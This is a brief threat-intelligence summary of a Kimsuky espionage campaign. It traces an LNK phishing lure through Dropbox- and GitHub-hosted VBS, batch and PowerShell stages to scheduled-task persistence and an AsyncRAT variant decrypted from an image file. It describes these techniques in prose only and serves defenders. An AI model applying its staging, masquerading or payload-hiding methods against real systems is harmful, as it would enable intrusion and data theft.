Kimsuky, also tracked as APT-C-55 and BabyShark, is described as an espionage-focused actor that targets government, diplomatic, think tank, media, and academic organizations tied to the Korean Peninsula and other regions. The observed campaign begins with a phishing LNK file named as a Korean-language China CMG interview document, which decrypts and opens a decoy while using a copied curl binary to download taskschd.vbs from Dropbox. The VBS stage pulls a batch script from GitHub, which then downloads two PowerShell scripts from Dropbox and GitHub. One PowerShell script creates a GoogleUpdateTaskMachineUA-named scheduled task for persistence and uploads host information to GitHub, while the other decrypts content from fox.png with a modified RC4 routine and reflectively loads a .NET payload identified as an AsyncRAT variant for sensitive information theft.